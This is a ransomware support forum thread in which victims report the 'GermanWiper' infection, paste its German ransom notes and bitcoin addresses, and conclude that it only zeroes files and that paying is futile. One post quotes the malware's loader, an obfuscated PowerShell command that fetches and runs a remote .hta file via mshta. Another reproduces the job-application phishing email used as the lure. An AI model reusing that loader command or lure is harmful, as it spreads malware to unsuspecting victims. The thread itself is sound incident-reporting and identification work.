GermanWiper Ransomware (random extensions .08kJA, .AVco3, .OQn1B) Support Topic

can anyone help me decrypting my files?
 
case-SHA1: 7d5cd76e6f8e37b7062fd16adeef5cef22210d04
 
What happened:
All your files have been encrypted and are no longer accessible to you until we decrypt them again. All encrypted files have the extension .08kJA.
 
Bitcoin Adress 1CQjaKJd8YKuvzjhjtCKy8QGP9CY4X6Xyc

I don't recognize it. Not often we see a ransom note entirely in German.

 

Of bigger concern though, is the file you uploaded - is completely zero'd out. No content, all zero bytes.
 

 

 

Alle Ihre Dateien wurden verschluesselt!



Was ist passiert?


Alle Ihre Dateien wurden verschluesselt und sind fuer Sie nicht mehr zugaenglich bis wir diese wieder entschluesseln. Alle verschluesselten Dateien wurden mit der Dateiendung .08kJA versehen.

Bitte folgen Sie unseren Anweisungen, wenn Sie Ihre Dateien zeitnah wieder entschluesseln wollen! Es besteht keine andere Moeglichkeit Ihre Daten wieder zu entschluesseln ausser unseren Anweisungen zu folgen!


Ich moechte meine Dateien entschluesseln!


Kein Problem! Um Ihre Dateien zu entschluesseln, benoetigen Sie unsere Entschluesselungssoftware, diese steht zum Kauf fuer umgerechnet ca. $1,500 bereit.
Der Betrag ist ausschliesslich in Bitcoin an die untenstehende Adresse zu zahlen.


Welche Garantien habe ich?


Uns interessiert nicht wer Sie sind oder was fuer Dateien Sie auf Ihrem Computer haben, wir sind ausschliesslich daran interessiert Ihnen die Entschluesselungssoftware zu verkaufen. Schlechtes Business spricht sich herum, sollten wir Ihre Dateien nicht entschluesseln, wuerde in Zukunft niemand unsere Entschluesselungssoftware kaufen - Was nicht in unserem Interesse liegt.


Wo bekomme ich Bitcoins?


Bitcoin koennen Sie schnell und einfach kaufen, z.B mit Kreditkarte, GiroPay oder (SOFORT) Ueberweisung. Es folgt eine Auflistung populaerer Tauschboersen und Bitcoin Marktplaetzen:
Coinmama - https://coinmama.com/
Bitpanda - https://www.bitpanda.com/
AnyCoinDirect - https://anycoindirect.eu/
Bitcoin.de - https://www.bitcoin.de/
BTC Direct - https://btcdirect.eu/de-at

Es gibt noch weitere moeglichkeiten Bitcoin zu erwerben, sollte keine der gelisteten fuer Sie funktionieren, hilft Ihnen eine kurze Google Suche.


Ich habe die Bitcoins gekauft


Senden Sie den folgenden Betrag an die fuer Sie generierte Bitcoin Adresse:

Betrag
0.15038835 Bitcoin

Bitcoin Adresse
1CQjaKJd8YKuvzjhjtCKy8QGP9CY4X6Xyc


Ich habe bezahlt - Was jetzt?


Nachdem die Zahlung auf der angegebenen Wallet eingegangen ist und diese 1 Bestaetigung im Bitcoin Netzwerk erhalten hat (30-60 Minuten) aktualisiert sich diese Seite automatisch mit dem Download Link fuer die Entschluesselungssoftware.

Bitte folgen Sie den Anweisungen in der Entschluesselungssoftware um sicherzustellen, dass alle Ihre Dateien korrekt entschluesselt werden.

Bitte beachten Sie, dass die Entschluesselungssoftware nur speziell fuer Ihren PC und die Dateiendung .08kJA funktioniert, es ist also sinnlos nach der Entschluesselungssoftware von anderen zu suchen.



Weitere Informationen

Bitte beachten Sie, dass wir Ihnen eine Frist von 7 Tagen setzen, diese laueft ab am: 06.08.2019.

Sollten wir bis dahin keinen Zahlungseingang feststellen, gehen wir davon aus, dass Sie nicht an der Entschluesselung Ihrer Daten interessiert sind und Loeschen den Private-Key fuer Ihren Computer unwiderruflich, in diesem Falle gehen Ihre Daten fuer immer verloren.

Beachten Sie, dass nur wir in der Lage sind Ihre Dateien wiederherzustellen, versuchen Sie nicht Ihre Dateien selber zu entschluesseln / wiederherzustellen, im besten Falle verschwenden Sie nur Ihre Zeit, im schlimmsten Falle beschaedigen Sie die verschluesselten Dateien und wir koennen Ihnen beim entschluesseln nicht mehr helfen!

we were hit today by a ransomware which is not found on google. file extension .AVco3 is added to the files.

see attached zip file to find an encrypted .docx from word. the html ransomnote file is found in every folder and pretends to refresh itself if $1500 in btc is paid.

the ransomware came by mail as a job application containing a zip file in a zip file which contained a windows shortcut executing: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "$hk=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$hk=$hk+'://178.33.106.120/out-1123954163.hta';mshta $hk"

the ip address 178.33.106.120 seems to come from france.

we were unable to determine the ransomware on https://id-ransomware.malwarehunterteam.com/

i'm providing this for everyone to know and maybe have a decryptor in the future.

neither avira antivirus nor malwarebytes detected anything so i guess the ransomware deleted itself after encryption.

i'll be happy to provide more information if it helps!

Same as this case: https://www.bleepingcomputer.com/forums/t/701735/ransomware-ending-08kja/

@ cnsupport

I merged your topic with the one noted by Demonslay335 to keep both in one dedicated topic.

we had the same bitcoin address: 1CQjaKJd8YKuvzjhjtCKy8QGP9CY4X6Xyc

so its definitely the same attacker.

 

what gives me the creeps is that the powershell code is executed without any notification from windows - a new dimension of malware execution. this could hit anyone!

i guess we will see much more attacks of this kind in the near future.

Hi Volks, one of our Clients catched something that could not have been identified on your Website. I uploaded the files and received following hash: SHA1: f98298315881d711b6b967d94e8a10e27fa55d0b Would you please be so Kind to have a look into this? Thank you!

Hi Volks, one of our Clients catched something that could not have been identified on your Website. I uploaded the files and received following hash: SHA1: f98298315881d711b6b967d94e8a10e27fa55d0b Would you please be so Kind to have a look into this? Thank you!

Are there any obvious file extensions appended to or with your encrypted data files? If so, what is the extension and is it the same for each encrypted file or is it different? Some types of ransomware will completely rename, encrypt or even scramble file names while others do not append any extensions. There are a few ransomwares which prepend a prefix to the beginning of the encrypted file name so some victims report encrypted data as not having any extensions.

Did you find any ransom notes and if so, what is the actual name of the ransom note?
Can you provide (copy & paste) the ransom note contents?
Did the cyber-criminals provide an email address to send payment to? If so, what is the email address?

...what gives me the creeps is that the powershell code is executed without any notification from windows - a new dimension of malware execution. this could hit anyone!...

Most crypto malware (ransomware) typically will run under the security credentials of the user....it will run on non-admin accounts under the same privileges as the infected user and encrypt any files that are accessible to that user. If the user can write to a file then the ransomware will be able to encrypt it. Ransomware needs write-access to files it encrypts so it will not be able to encrypt files owned by another account without write-access while running as a non-admin account.

Since crypto malware can run as a non-admin user, you will not necessarily see a UAC prompt. If your normal user account is member of the Administrator group, the malware can install itself to run for all users. However, some ransomware do not deploy any techniques of UAC bypass and the UAC confirmation pops up...if accepted, the main process deploys another copy of itself with elevated privileges and also executes some commands via Windows shell as explained in this threat analysis.

Well, there are not txt-files.

There is only a htm-file (on almost every folder). The Content is written in German without any hints either (please let me know if you still would like to see the text of the message...).

It just tells you that files have been incrypted with a random file extension.

In this case its *.OQn1B.

This applies for alle files wihtin the User-Folder. The Admin-Folder for example or the Program-Files have not been compromised.

 

There is no eMail, Name or any other information about the Ransomware used or about the actual Person except for the Bitcoin-Wallet the User should send the money to.

What you describe is a new ransomware which has already been reported here.

Rather than have everyone with individual topics, I am going to merge your postings into this topic.

Good afternoon everybody,

 

 

a customer of ours got hit by a Ransomware that creates ".7kS8H" file extensions. I tried to identify it with https://id-ransomware.malwarehunterteam.com/ , but the result was that it could not be identified.

 

I attached the ransom note and one encrypted file in a zip-file to this message, as one obviously is not permitted to upload this kind of files unzipped.

 

The case-SHA1 i was advised to mention here is 7201e3d7f7fc31b3c9ea7e39727fea1293dad07a

 

 

For those who don't want or don't have the time to take a closer look at the files i attached, here is the original text of the ransom note in italics. An .html-file by the way, not a .txt. Also the wording might help to identify which ransomware this is.

 

By the way: When i googled for "Alle Ihre Dateien wurden verschluesselt und sind fuer Sie nicht mehr zugaenglich bis" i found not more than 2 results which are from the last two days and which lead to this posting on bleepingcomputer: https://www.bleepingcomputer.com/forums/t/701735/new-ransomware-with-german-note-random-extensions-08kja-avco3-oqn1b/#entry4839002
 

 

According to user quietman7 the author of the posting was hit  by a new ransomware  which has already been reported here https://twitter.com/demonslay335/status/1154539446374563841 and - when i understand everything right - which Michael Gillespie calls bopador.

 

So maybe our customer got hit by bopador? Although the extension ".7kS8H" is different from all those mentioned here https://www.bleepingcomputer.com/forums/t/701807/hello-help-to-recover-my-data-from-ransom-virus-bopador/ and the Ransom note is not a .txt- but an .html-file. Also ID-Ransomware could not recognize it either. Anyway, here is the text of the ransom note:

 

 

Alle Ihre Dateien wurden verschluesselt!

Was ist passiert?

Alle Ihre Dateien wurden verschluesselt und sind fuer Sie nicht mehr zugaenglich bis wir diese wieder entschluesseln. Alle verschluesselten Dateien wurden mit der Dateiendung .7kS8H versehen.

Bitte folgen Sie unseren Anweisungen, wenn Sie Ihre Dateien zeitnah wieder entschluesseln wollen! Es besteht keine andere Moeglichkeit Ihre Daten wieder zu entschluesseln ausser unseren Anweisungen zu folgen!

Ich moechte meine Dateien entschluesseln!

Kein Problem! Um Ihre Dateien zu entschluesseln, benoetigen Sie unsere Entschluesselungssoftware, diese steht zum Kauf fuer umgerechnet ca. $1,500 bereit.
Der Betrag ist ausschliesslich in Bitcoin an die untenstehende Adresse zu zahlen.

Welche Garantien habe ich?

Uns interessiert nicht wer Sie sind oder was fuer Dateien Sie auf Ihrem Computer haben, wir sind ausschliesslich daran interessiert Ihnen die Entschluesselungssoftware zu verkaufen. Schlechtes Business spricht sich herum, sollten wir Ihre Dateien nicht entschluesseln, wuerde in Zukunft niemand unsere Entschluesselungssoftware kaufen - Was nicht in unserem Interesse liegt.

Wo bekomme ich Bitcoins?

Bitcoin koennen Sie schnell und einfach kaufen, z.B mit Kreditkarte, GiroPay oder (SOFORT) Ueberweisung. Es folgt eine Auflistung populaerer Tauschboersen und Bitcoin Marktplaetzen:
Coinmama - https://coinmama.com/
Bitpanda - https://www.bitpanda.com/
AnyCoinDirect - https://anycoindirect.eu/
Bitcoin.de - https://www.bitcoin.de/
BTC Direct - https://btcdirect.eu/de-at

Es gibt noch weitere moeglichkeiten Bitcoin zu erwerben, sollte keine der gelisteten fuer Sie funktionieren, hilft Ihnen eine kurze Google Suche.

Ich habe die Bitcoins gekauft

Senden Sie den folgenden Betrag an die fuer Sie generierte Bitcoin Adresse:

Betrag
0.15038835 Bitcoin

Bitcoin Adresse
********************************************

Ich habe bezahlt - Was jetzt?

Nachdem die Zahlung auf der angegebenen Wallet eingegangen ist und diese 1 Bestaetigung im Bitcoin Netzwerk erhalten hat (30-60 Minuten) aktualisiert sich diese Seite automatisch mit dem Download Link fuer die Entschluesselungssoftware.

Bitte folgen Sie den Anweisungen in der Entschluesselungssoftware um sicherzustellen, dass alle Ihre Dateien korrekt entschluesselt werden.

Bitte beachten Sie, dass die Entschluesselungssoftware nur speziell fuer Ihren PC und die Dateiendung .7kS8H funktioniert, es ist also sinnlos nach der Entschluesselungssoftware von anderen zu suchen.

 

Weitere Informationen

Bitte beachten Sie, dass wir Ihnen eine Frist von 7 Tagen setzen, diese laueft ab am: 08.08.2019.

Sollten wir bis dahin keinen Zahlungseingang feststellen, gehen wir davon aus, dass Sie nicht an der Entschluesselung Ihrer Daten interessiert sind und Loeschen den Private-Key fuer Ihren Computer unwiderruflich, in diesem Falle gehen Ihre Daten fuer immer verloren.

Beachten Sie, dass nur wir in der Lage sind Ihre Dateien wiederherzustellen, versuchen Sie nicht Ihre Dateien selber zu entschluesseln / wiederherzustellen, im besten Falle verschwenden Sie nur Ihre Zeit, im schlimmsten Falle beschaedigen Sie die verschluesselten Dateien und wir koennen Ihnen beim entschluesseln nicht mehr helfen!

 

 

I'd be interested in any kind of Information. Although i am quite sure that the files can't be decrypted, at least not yet.

 

 

Kind regards and thank you for any help

 

 

HAL

Edited by HAL9001, 01 August 2019 - 11:51 AM.

@ HAL9001

This appears to be the same infection several victims have already reported in this topic.

Since this is infection is new and not widespread, rather than have everyone with individual topics, I merged your topic with this one.

We've received a sample of the malware, and confirmed all it does is overwrite files with zeros. So that means data is not recoverable, do not pay.

 

https://twitter.com/James_inthe_box/status/1156995888289501185

 

Your best bet would be trying "deleted file recovery" such as Recuva, or ShadowExplorer for shadow copies. Always worth a shot.

 

For lack of a better name, I've dubbed it "GermanWiper" on ID Ransomware to point victims here.

Hello everyone,

I found this thread via Twitter and wanted to share my experience as well. I received the malicious E-Mail and attachments (.LNKs with a powershell command disguised as "Applicant name - Lebenslauf.doc.lnk")  from a victim this morning. I can confirm that the files are zero-ed out, so I'm positive that they won't be recoverable. I tried to download the malicious .hta hosted on an OVH Server at 178.33.106.120 but could not get my hands on it, so I can't comment on the structure or contents of the file. The Bitcoin Wallet address specified in the HTML ransom note is

1Ft45aW8b3HeoJGe9NmJz8H3Hu7NpwdHzY

with a requested amount of 0.15 BTC. For further reference I'll also include the original E-Mail. What stands out to me is that the german spelling and grammar is on point and it felt like a semi-targeted attack. (If necessary I can provide a full translation as well)

 

 

Subject: Bewerbung auf die Stelle bei der Arbeitsagentur

From: Doris Sammer <doris.sammer@rasendmail.com>

Time received: 30.07.2019 10:28 (UTC+2)

 

Sehr geehrte Damen und Herren,

mit großem Interesse bin auf der Internetseite der Arbeitsagentur auf Ihre
ausgeschriebene Position aufmerksam geworden. Gerne möchte ich mich Ihnen
als qualifizierte Bewerberin vorstellen.

In eine neue Aufgabe bei Ihnen kann ich verschiedene Stärken einbringen. So
gehe ich meine Aufgaben sehr zuverlässig, verantwortungsbewusst und präzise
an. Mit mir gewinnt Ihr Unternehmen einen Mitarbeiter, der flexibel,
motiviert und teamorientiert ist. Außerdem habe ich in früheren Projekten
insbesondere ausgeprägte Kommunikationsstärke, hohe Lernbereitschaft und
viel Kreativität unter Beweis stellen können.

Konnte ich Sie mit dieser Bewerbung überzeugen? Ich bin für einen Einstieg
zum nächstmöglichen Zeitpunkt verfügbar. Einen vertiefenden Eindruck gebe
ich Ihnen gerne in einem persönlichen Gespräch. Ich freue mich über Ihre
Einladung!

Mit freundlichen Grüßen,

Doris Sammer

Anlagen: Lebenslauf, Arbeitszeugnisse, Bewerbungsfoto

 

Have a nice day / afternoon / evening

Edited by f0wL, 01 August 2019 - 04:26 PM.